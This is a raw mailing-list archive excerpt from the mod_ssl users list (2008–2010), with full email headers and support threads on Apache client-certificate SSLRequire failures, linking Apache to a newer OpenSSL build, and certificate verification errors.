	(No client certificate requested)
	(Authenticated sender: jblaine@kickflop.net)
	by homiemail-a22.g.dreamhost.com (Postfix) with ESMTPSA id E7A5A1A8069
	for ; Tue, 19 Oct 2010 13:35:54 -0700 (PDT)
Message-ID: <4CBE0125.5080903@kickflop.net>
Date: Tue, 19 Oct 2010 16:35:49 -0400
From: Jeff Blaine 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.11) Gecko/20101013 Thunderbird/3.1.5
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Certs work, one doesn't, cannot determine why
References: <4CB8CC6D.9080900@kickflop.net>
In-Reply-To: <4CB8CC6D.9080900@kickflop.net>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Blaine 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Still trying to solve this, I stood up a separate
brand-spanking-new Apache 2.2.17 from source with builtin
SSL.  I am using the same Apache SSL config as quoted below.
I experience the following failure (further context is in
my quoted message below):

...
[Tue Oct 19 16:20:42 2010] [info] Subsequent (No.2) HTTPS request 
received for child 4 (server rtdev1.our.org:999)
[Tue Oct 19 16:20:42 2010] [error] [client 1xx.xx.9.45] client denied by 
server configuration: /apps/rtsrv1dev/share/html/favicon.ico
[19/Oct/2010:16:20:42 -0400] 1xx.xx.9.45 on TLSv1 AES128-SHA 128 
/O=our.org/OU=people/UID=jblaine/CN=Blaine Charles J. SUCCESS 3 369E 
Blaine Charles J. - "GET /favicon.ico HTTP/1.1" 213
[Tue Oct 19 16:20:47 2010] [debug] ssl_engine_io.c(1900): OpenSSL: I/O 
error, 5 bytes expected to read on BIO#1c2e8170 [mem: 1c2f98b0]
[Tue Oct 19 16:20:47 2010] [info] [client 1xx.xx.9.45] (70007)The 
timeout specified has expired: SSL input filter read failed.
[Tue Oct 19 16:20:47 2010] [debug] ssl_engine_kernel.c(1884): OpenSSL: 
Write: SSL negotiation finished successfully
[Tue Oct 19 16:20:47 2010] [info] [client 1xx.xx.9.45] Connection closed 
to child 4 with standard shutdown (server rtdev1.our.org:999)

NOTE: "SUCCESS"
NOTE: "SSL negotiation finished successfully"
NOTE: /apps/rtsrv1dev/share/html and all files in it are
       world-readable (644)

Browser shows "Forbidden"

IE 8
and Chrome 6

On 10/15/2010 5:49 PM, Jeff Blaine wrote:
> Hi folks. I'm *really* stumped here. If anyone has any
> ideas, I would love to hear them. How can I debug this
> further? I need more information that Apache + mod_ssl
> is giving me right now.
>
> All version information and configuration detail is after
> this next paragraph.
>
> Works: SSL via my corporate cert, SSL via 3 other people's
> corporate certs
> Fails: 1 person's cert so far, yet is logged as "SUCCESS"
> when logging SSL_CLIENT_VERIFY via CustomLog
>
> Example:
>
> [15/Oct/2010:09:53:38 -0400] 1xx.xx.160.92 on TLSv1 RC4-MD5 128
> /O=our.org/OU=People/UID=mbs/CN=Simpson Mary B SUCCESS 3 452E Simpson
> Mary B - "GET /index.html HTTP/1.1" 295
>
> [Fri Oct 15 09:53:38 2010] [error] [client 1xx.xx.160.92] access to
> /apps/rtsrv1dev/share/html/index.html failed, reason: SSL requirement
> expression not fulfilled (see SSL logfile for more details)
>
> Config Specifics:
>
> OS: RHELv5
> Apache: 2.2.3
> mod_ssl: 2.2.3-43.el5
>
> 
> ServerName rtdev1.our.org:443
>
> ErrorLog logs/ssl_error443_log
> TransferLog logs/ssl_access443_log
> LogLevel warn
>
> SSLEngine on
> SSLProtocol all -SSLv2
> SSLCipherSuite ALL:!ADH:!EXPORT:SSLv3:RC4+RSA:+HIGH:+MEDIUM:+LOW
> SSLCertificateFile /apps/rtsrv1dev/PKI/rtdev1-signed.cer
> SSLCertificateKeyFile /apps/rtsrv1dev/PKI/rtdev1.key
> SSLCertificateChainFile /apps/rtsrv1dev/PKI/rtdev1-signed.cer
> SSLCACertificateFile /apps/rtsrv1dev/PKI/MITRE-cert-bundle.cer
> SSLVerifyClient require
> SSLVerifyDepth 2
>
> SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire
>
> 
> SSLOptions +StdEnvVars
> 
> 
> SSLOptions +StdEnvVars
> 
>
> SetEnvIf User-Agent ".*MSIE.*" \
> nokeepalive ssl-unclean-shutdown \
> downgrade-1.0 force-response-1.0
>
> CustomLog logs/ssl_access443_log \
> "%h - - %t \"%r\" %{HTTPS}x %{SSL_PROTOCOL}x"
>
> CustomLog logs/ssl_error443_log \
> "%t %h %{HTTPS}x %{SSL_PROTOCOL}x %{SSL_CIPHER}x
> %{SSL_CIPHER_USEKEYSIZE}x %{SSL_CLIENT_S_DN}x %{SSL_CLIENT_VERIFY}x
> %{SSL_CLIENT_M_VERSION}x %{SSL_CLIENT_M_SERIAL}x %{SSL_CLIENT_S_DN_CN}x
> %{SSL_CLIENT_S_DN_UID}x \"%r\" %b"
>
> DocumentRoot /apps/rtsrv1dev/share/html
> AddDefaultCharset UTF-8
> PerlRequire "/apps/rtsrv1dev/bin/webmux.pl"
> SetHandler default
> 
>
> 
> SetHandler perl-script
> PerlResponseHandler RT::Mason
> SSLVerifyClient require
>
> SSLRequire %{SSL_CLIENT_S_DN} in { \
> "/O=our.org/OU=people/UID=jblaine/CN=Blaine Charles J.", \
> "/O=our.org/OU=people/UID=mloveless/CN=Laveless Marc W.", \
> "/O=our.org/OU=people/UID=mbs/CN=Simpson Mary B", \
> "/O=our.org/OU=people/UID=bcietta/CN=Cietta Barbara A." \
> }
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 28 17:56:17 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A841F14DAA1; Thu, 28 Oct 2010 17:56:17 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.heartlandamerica.com (mail.heartlandamerica.com [65.121.1.4])
	by master.modssl.org (Postfix) with SMTP id 1C9D214D836
	for ; Thu, 28 Oct 2010 17:56:00 +0200 (CEST)
Received: by mail.heartlandamerica.com (Postfix, from userid 4294967294)
	id 0DD3850EEC0B; Thu, 28 Oct 2010 10:53:28 -0500 (CDT)
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	mail.heartlandamerica.com.private
X-Spam-Level: 
X-Spam-Status: No, score=-2.1 required=5.0 tests=ALL_TRUSTED,AWL,BAYES_00
	autolearn=ham version=3.3.1
Received: from gunnergelleaea8 (unknown [172.16.202.69])
	by mail.heartlandamerica.com (Postfix) with ESMTPA id 92A6A50EEBF3;
	Thu, 28 Oct 2010 10:53:25 -0500 (CDT)
From: "Gunner Geller" 
To: 
Cc: ,
	
References: <00e701cb5039$fd717420$f8545c60$@com> <4C8E63DD.4000707@glewis.com>
In-Reply-To: <4C8E63DD.4000707@glewis.com>
Subject: RE: Specifying the openssl version used with mod_ssl
Date: Thu, 28 Oct 2010 10:53:22 -0500
Message-ID: <065701cb76b8$3faeee40$bf0ccac0$@com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: ActTa+k+Xu8NQTv2SEKqCkP9LvhvtAjRfj+A
Content-Language: en-us
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gunner Geller" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all,
	Sorry for the delay. We found a work around and quit looking into
the below issue. Thanks to Peter for the static library suggestion and Lee
for the same and for getting me back on the topic. We were able to get
everything working how it should. A note, we are compiling modssl into
apache. We are not using it as a shared object. Here are the key config
options for openssl and apache:

Openssl:

./configure --prefix=/usr/local/ssl --shared

Apache:

./configure --with-included-apr --enable-ssl --with-ssl=/usr/local/ssl 


It is probably a good idea to run a sudo make clean for each installation.
At least it was for us since we re-installed about 50 times.


Thanks again,

Gunner Geller


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Gregg L. Smith
Sent: Monday, September 13, 2010 12:48 PM
To: modssl-users@modssl.org
Subject: Re: Specifying the openssl version used with mod_ssl

Hello Gunner,

Have you tried
--enable-ssl --with-ssl=/path/to/just/compiled/openssl ?

Regards,

Gregg

Gunner Geller wrote:
>  Hello,
> 
>     We are using mac Leopard OS. We have rolled our own Apache(2.2.16)
> separate from the default install. We have also rolled our own OpenSSL to
> the latest version. However when we compile Apache and enable mod_ssl it
> still uses the old OpenSSL version. We can see it in our http headers:
> 
>  
> 
> Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7l
> 
>  
> 
> When typing "openssl version" from my account and the root account I get:
> 
> OpenSSL 1.0.0a 1 Jun 2010
> 
> I've seen this in some apache configs:
> 
> --enable-ssl --with-ssl=/usr/local/ssl
> 
> I've tried the above with no success. According to the output I get when
> configuring/making/installing apache it is finding openssl at the above
> directory. The problem is though that the http header stays the same.
> 
>  
> 
> The problem is we can't upgrade the default openssl version on the OS
> without apple providing the update. The outdated version is tripping our
> security scans. Like I said we rolled our owned updated version but cannot
> get apache/mod_ssl to use it. Any help is appreciated.
> 
> Thanks,
> 
>  
> 
> Gunner Geller
> 
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  1 12:17:41 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 76E0114DA28; Mon,  1 Nov 2010 12:17:41 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [209.132.183.28])
	by master.modssl.org (Postfix) with ESMTP id D44EE14D836
	for ; Mon,  1 Nov 2010 12:17:24 +0100 (CET)
Received: from int-mx01.intmail.prod.int.phx2.redhat.com (int-mx01.intmail.prod.int.phx2.redhat.com [10.5.11.11])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id oA1BEwmj008893
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK);
	Mon, 1 Nov 2010 07:14:58 -0400
Received: from turnip.manyfish.co.uk (vpn-9-230.rdu.redhat.com [10.11.9.230])
	by int-mx01.intmail.prod.int.phx2.redhat.com (8.13.8/8.13.8) with ESMTP id oA1BEuDM009643
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO);
	Mon, 1 Nov 2010 07:14:57 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.72)
	(envelope-from )
	id 1PCsLn-0001sh-Ks; Mon, 01 Nov 2010 11:14:55 +0000
Date: Mon, 1 Nov 2010 11:14:55 +0000
From: Joe Orton 
To: Jeff Blaine 
Cc: modssl-users@modssl.org
Subject: Re: Certs work, one doesn't, cannot determine why
Message-ID: <20101101111455.GB6665@redhat.com>
Mail-Followup-To: Jeff Blaine ,
	modssl-users@modssl.org
References: <4CB8CC6D.9080900@kickflop.net>
 <4CBE0125.5080903@kickflop.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <4CBE0125.5080903@kickflop.net>
User-Agent: Mutt/1.5.20 (2009-08-17)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.67 on 10.5.11.11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Oct 19, 2010 at 04:35:49PM -0400, Jeff Blaine wrote:
> >Works: SSL via my corporate cert, SSL via 3 other people's
> >corporate certs
> >Fails: 1 person's cert so far, yet is logged as "SUCCESS"
> >when logging SSL_CLIENT_VERIFY via CustomLog

Your verbose description of "something goes is not working" is hard to 
follow or condense down. Are you saying with the below configuration, 
you are seeing the SSLRequire work for all the users but that with the 
jblaine cert?

It could be an SSLRequire implementation bug but it is hard to tell.  Is 
the order of the users within the SSLRequire list significant?  Why are 
you matching by the whole S_DN rather than based on e.g. S_DN_CN alone?

You might be better off trying the httpd users' list:

http://httpd.apache.org/lists.html#http-users

Regards, Joe

> >
> >SetHandler perl-script
> >PerlResponseHandler RT::Mason
> >SSLVerifyClient require
> >
> >SSLRequire %{SSL_CLIENT_S_DN} in { \
> >"/O=our.org/OU=people/UID=jblaine/CN=Blaine Charles J.", \
> >"/O=our.org/OU=people/UID=mloveless/CN=Laveless Marc W.", \
> >"/O=our.org/OU=people/UID=mbs/CN=Simpson Mary B", \
> >"/O=our.org/OU=people/UID=bcietta/CN=Cietta Barbara A." \
> >}
> >
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  1 19:31:00 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3D61914DA73; Mon,  1 Nov 2010 19:31:00 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from homiemail-a23.g.dreamhost.com (mailbigip.dreamhost.com [208.97.132.5])
	by master.modssl.org (Postfix) with ESMTP id B663014D836
	for ; Mon,  1 Nov 2010 19:30:43 +0100 (CET)
Received: from homiemail-a23.g.dreamhost.com (localhost [127.0.0.1])
	by homiemail-a23.g.dreamhost.com (Postfix) with ESMTP id 8504B4B0063
	for ; Mon,  1 Nov 2010 11:28:17 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; c=nofws; d=kickflop.net; h=message-id:date
	:from:mime-version:to:subject:references:in-reply-to
	:content-type:content-transfer-encoding; q=dns; s=kickflop.net;
	 b=G0YA80e8pf5OnmMi3yvKn8tISOpWMX1E1uSgt/GeFLEBTh1dnQUfMjvpxZ0OX
	9b9aKqzwBAg2fMkBLHA/UjJbJRZawKnMKva8DVZIfGKHFVeozKoil9FOSGnwMXgj
	BOZ/ew9uH80YvO9hZ4MUrYYAnyMhzxY6TCfyTrmD0Kjmlw=
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=kickflop.net; h=message-id
	:date:from:mime-version:to:subject:references:in-reply-to
	:content-type:content-transfer-encoding; s=kickflop.net; bh=rqIr
	x75FKYgUytdAf0e5pzGXA8w=; b=XAOWRi1cp9oRXYI971ZFWV/FS18Y6b3z+E1S
	dH0II6itia5HkeNUEhYO9XRd+kLZhomoYFSAfHu8WepXfTX9W/ycUp/q/WceF4yf
	UVfkN+WkHRnwTTsUv/a00FgajF/PpiY8VHN89t9LrefJ9k6+bAoJdhBkzlcdYXU5
	WtGCHQY=
Received: from [192.168.1.4] (pool-108-9-57-66.tampfl.fios.verizon.net [108.9.57.66])
	(using TLSv1 with cipher AES256-SHA (256/256 bits))
	(No client certificate requested)
	(Authenticated sender: jblaine@kickflop.net)
	by homiemail-a23.g.dreamhost.com (Postfix) with ESMTPSA id 4F78F4B0058
	for ; Mon,  1 Nov 2010 11:28:17 -0700 (PDT)
Message-ID: <4CCF06AC.90006@kickflop.net>
Date: Mon, 01 Nov 2010 14:27:56 -0400
From: Jeff Blaine 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.12) Gecko/20101027 Thunderbird/3.1.6
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Certs work, one doesn't, cannot determine why
References: <4CB8CC6D.9080900@kickflop.net> <4CBE0125.5080903@kickflop.net> <20101101111455.GB6665@redhat.com>
In-Reply-To: <20101101111455.GB6665@redhat.com>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Blaine 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 11/1/2010 7:14 AM, Joe Orton wrote:
> On Tue, Oct 19, 2010 at 04:35:49PM -0400, Jeff Blaine wrote:
>>> Works: SSL via my corporate cert, SSL via 3 other people's
>>> corporate certs
>>> Fails: 1 person's cert so far, yet is logged as "SUCCESS"
>>> when logging SSL_CLIENT_VERIFY via CustomLog
>
> Your verbose description of "something goes is not working" is hard to
> follow or condense down. Are you saying with the below configuration,
> you are seeing the SSLRequire work for all the users but that with the
> jblaine cert?

I was originally seeing it work fine for everyone but 1 user
(Simpson Mary B, below).  Now it almost seems somewhat random
in failure.  People who used to succeed are now failing.
I can get in fine (Blaine Charles J.)

Granted, I am messing with all sorts of things trying to get
it work after all this time dead in the water.

> It could be an SSLRequire implementation bug but it is hard to tell.  Is
> the order of the users within the SSLRequire list significant?

Ah, you mean if I reorder them, does the success/failure
situation change as well?  I don't know, I can try that.

 > Why are you matching by the whole S_DN rather than based on
 > e.g. S_DN_CN alone?

Why not?  It seems like the more fully correct way to match
for security.  It's documented and supposedly legit/correct.
The cert-extracted DN (reported in log) matches the configured
DN in the ssl.conf file exactly.

I will try the httpd list.

Thanks Joe
Jeff

>>> 
>>> SetHandler perl-script
>>> PerlResponseHandler RT::Mason
>>> SSLVerifyClient require
>>>
>>> SSLRequire %{SSL_CLIENT_S_DN} in { \
>>> "/O=our.org/OU=people/UID=jblaine/CN=Blaine Charles J.", \
>>> "/O=our.org/OU=people/UID=mloveless/CN=Laveless Marc W.", \
>>> "/O=our.org/OU=people/UID=mbs/CN=Simpson Mary B", \
>>> "/O=our.org/OU=people/UID=bcietta/CN=Cietta Barbara A." \
>>> }
>>> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 17 21:34:18 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D6A0E14DA76; Wed, 17 Nov 2010 21:34:18 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 667AA14D85C
	for ; Wed, 17 Nov 2010 21:34:02 +0100 (CET)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1PIofI-0006xo-Rc
	for modssl-users@modssl.org; Wed, 17 Nov 2010 12:31:36 -0800
Message-ID: <30238956.post@talk.nabble.com>
Date: Wed, 17 Nov 2010 12:31:36 -0800 (PST)
From: dreed2010 
To: modssl-users@modssl.org
Subject: App requires port 8081, gets errors using HTTPS
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: DReed@CMAL.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: dreed2010 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I have a third-party XML application compiled into Apache as a module that
requires using port 8081.  I have run it successfully for years using HTTP
on Apache 1.3.27 (the version required by the vendor), but now I need to run
it using HTTPS.

So, I installed openssl-0.9.4 and mod_ssl-2.8.14-1.3.27 and the installation
seemed to go well except for the question "File to Patch:  ", which I had to
skip since I had no answer for it.

The application still runs fine when I browse to http://my.app.com:8081, but
when I try HTTPS using https://my.app.com:8081 I get a message that "Secure
Connection Failed - SSL received a record that exceeded the maximum
permissible length (Error code: ssl_error_rx_record_too_long)."  An error
codes reference says, "This generally indicates that the remote peer system
has a flawed implementation of SSL, and is violating the SSL specification."

The Apache error log says "Invalid method in request \x16\x03\x01"

Any thoughts on how to troubleshoot this?

Thanks,
Dave

-- 
View this message in context: http://old.nabble.com/App-requires-port-8081%2C-gets-errors-using-HTTPS-tp30238956p30238956.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec 20 07:03:38 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D4A8A14D9D9; Mon, 20 Dec 2010 07:03:37 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from tus1smtoutpex03.symantec.com (tus1smtoutpex03.symantec.com [216.10.195.243])
	by master.modssl.org (Postfix) with ESMTP id 2499214D838
	for ; Mon, 20 Dec 2010 07:03:20 +0100 (CET)
X-AuditID: d80ac3f3-b7c53ae000001934-3b-4d0ef115ee38
Received: from tus1opsmtapin02.ges.symantec.com (tus1opsmtapin02.ges.symantec.com [192.168.214.44])
	by tus1smtoutpex03.symantec.com (Symantec Brightmail Gateway) with SMTP id 2F.52.06452.511FE0D4; Sun, 19 Dec 2010 23:00:53 -0700 (MST)
Received: from [155.64.230.20] (helo=TUS1XCHECNPIN03.enterprise.veritas.com)
	by tus1opsmtapin02.ges.symantec.com with esmtp (Exim 4.72)
	(envelope-from )
	id 1PUYnl-0001ZR-PG
	for modssl-users@modssl.org; Sun, 19 Dec 2010 22:00:53 -0800
Received: from PUNAXCHECNPIN02.enterprise.veritas.com ([10.217.161.22]) by TUS1XCHECNPIN03.enterprise.veritas.com with Microsoft SMTPSVC(6.0.3790.4675);
	 Sun, 19 Dec 2010 22:59:24 -0700
Received: from PUNAXCHEVSPIN04.enterprise.veritas.com ([10.217.161.15]) by PUNAXCHECNPIN02.enterprise.veritas.com with Microsoft SMTPSVC(6.0.3790.4675);
	 Mon, 20 Dec 2010 11:29:21 +0530
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01CBA00B.0B8B3E39"
Subject: peer did not return a certificate No CAs known to server for verification?
Date: Mon, 20 Dec 2010 11:29:18 +0530
Message-ID: <3A1A138E2C4B704595BEB360A6DF9F790790907D@PUNAXCHCLUPIN08.enterprise.veritas.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: peer did not return a certificate No CAs known to server for verification?
Thread-Index: AcugCwoAnM3B3SgzQLqOIniK3d+nMg==
From: "Abhijit Bhate" 
To: 
X-OriginalArrivalTime: 20 Dec 2010 05:59:21.0222 (UTC) FILETIME=[0BBD2260:01CBA00B]
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFprMIsWRmVeSWpSXmKPExsVyYMU1HV3Rj3y+Bk9nm1r035/A5sDo8W7m
	T9YAxigum5TUnMyy1CJ9uwSujMmHtrAWPDeo+PZ8O0sD4w3NLkZODgkBE4nmydvZIWwxiQv3
	1rN1MXJxCAm8YZT4N3EalNPLJLHp6mMWCGc3o0TvskUIzp3J/VD9ehKrpvSB2cwCWhJHLjUx
	gti8AoISJ2c+YYGIh0ucaWplBrGFBYIlNv5/wQpiswioSrzfNoUZoj5WYuq6XSwQMwUlFs3e
	wwxz379dD9lAbBGBCIk1/xugbD2JOZuPgs1hEzCSWHhtJzNEXFbiYP8bqNuCJRr/fWKawCgy
	C8l5s5CcNwvJebMYOYBsPYm2jYwQYW2JZQtfM0PYuhL/n89hRhZfwMi+ilGmpLTYsDi3JL+0
	pCC1wsBYr7gyNxEYUcl6yfm5mxiBUXWD6/DnHYw7V2kfYhTgYFTi4b3/lM9XiDWxDKjyEKME
	B7OSCK/lCqAQb0piZVVqUX58UWlOavEhRmkOFiVx3rrp3L5CAumJJanZqakFqUUwWSYOTqkG
	xrl89w5cndvwUk53x/x7AVtWKPFz/hQ+rp/A/nHHioU9B+V6Np78YvgtepfxT9OsmTOD1L3+
	+noarN8Xsr/9oeX0SSxbnzUe6eB5qpP94vmhuctPbK0RNVLS61o6ceUEzqBo86KwaRfvcGhK
	2z1kX6HBWa6441yW2tqS9R/CV18TOCL2qFJtirUSS3FGoqEWc1FxIgANUq3NpgIAAA==
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Abhijit Bhate" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01CBA00B.0B8B3E39
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hello All,

=20

We have opened a java web service & our clients are facing issues while
accessing it. They are consistently getting SSL / TLS connection failure
message. All these clients are using VeriSign class 1 certificates. In
apache error logs we see below message:

=20

[Fri Oct 12 17:42:04 2007] [error] mod_ssl: Certificate Verification:
Error (20): unable to get local issuer certificate=20
[Fri Oct 12 17:42:04 2007] [error] mod_ssl: Re-negotiation handshake
failed: Not accepted by client!?=20
[Fri Oct 12 17:42:04 2007] [error] mod_ssl: Certificate Verification:
Error (20): unable to get local issuer certificate=20
[Fri Oct 12 17:42:04 2007] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)=20
[Fri Oct 12 17:42:04 2007] [error] OpenSSL: error:140890B2:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned

=20

This is happening only with class 1 certificates, class 3 certificates
are working fine. Earlier we were using IBM HTTP Server & our clients
were able to connect to our web service. But since we have moved to
Apache HTTP Server, they are facing this issue.

=20

Is there any known fix for this? kindly advice. You suggestions are real
value for us.

=20

Note: All these clients are either PHP / .NET clients. Java clients are
able to use class 1 certificates successfully.

=20

Thanks,

Abhijit Mohan Bhate

+91-98-50-886360

=20


------_=_NextPart_001_01CBA00B.0B8B3E39
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hello =
All,



 



We have opened a java =
web
service & our clients are facing issues while accessing it. They are
consistently getting SSL / TLS connection failure message. All these =
clients
are using VeriSign class 1 certificates. In apache error logs we see =
below message:



 



[Fri Oct 12 17:42:04 2007] [error] mod_ssl: Certificate
Verification: Error (20): unable to get local issuer certificate 

[Fri Oct 12 17:42:04 2007] [error] mod_ssl: Re-negotiation handshake =
failed:
Not accepted by client!? 

[Fri Oct 12 17:42:04 2007] [error] mod_ssl: Certificate Verification: =
Error
(20): unable to get local issuer certificate 

[Fri Oct 12 17:42:04 2007] [error] mod_ssl: SSL error on writing data =
(OpenSSL
library error follows) 

[Fri Oct 12 17:42:04 2007] [error] OpenSSL: error:140890B2:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate =
returned



 



This is happening =
only with
class 1 certificates, class 3 certificates are working fine. Earlier we =
were
using IBM HTTP Server & our clients were able to connect to our web
service. But since we have moved to Apache HTTP Server, they are facing =
this
issue.



 



Is there any known =
fix for this?
kindly advice. You suggestions are real value for =
us.



 



Note: All these =
clients are
either PHP / .NET clients. Java clients are able to use class 1 =
certificates successfully.



 



Thanks,



Abhijit Mohan =
Bhate



+91-98-50-886360



 









------_=_NextPart_001_01CBA00B.0B8B3E39--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


I am out of the office until 07/25/2008.



For the week of July 14-18th I will be out of t=
he office on vacation and will not be checking vmail or email. 



For the week of July 21-25th I will be travelli=
ng in the United States and will only have intermittent email access. <=
br>


While I'm away please feel free to contact my m=
anager, Nancy Crooks (ncrooks@us.ibm.com) at 201 967-6428 for any techn=
ical issues related to ITCAM. 



I will respond to your message when I return.


Thank you.





Note: This is an automated re=
sponse to your message  "Apache removal=
 of user's access rights" sent on 7/11/08 17:47:53. 



This is the only notification=
 you will receive while this person is away.=

--0__=0ABBFE16DFF2B8FE8f9e8a93df938690918c0ABBFE16DFF2B8FE--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 14 20:11:14 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 39A2214DA38; Mon, 14 Jul 2008 20:11:14 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from fmailhost01.isp.att.net (fmailhost01.isp.att.net [207.115.11.51])
	by master.modssl.org (Postfix) with ESMTP id A253614D840
	for ; Mon, 14 Jul 2008 20:11:13 +0200 (CEST)
Received: from fwebmail09.isp.att.net ([207.115.11.159])
          by isp.att.net (frfwmhc01) with SMTP
          id <20080714181013H0100md2mie>; Mon, 14 Jul 2008 18:10:14 +0000
X-Originating-IP: [207.115.11.159]
Received: from [66.176.74.215] by fwebmail09.isp.att.net;
	Mon, 14 Jul 2008 18:10:12 +0000
From: erika20@bellsouth.net
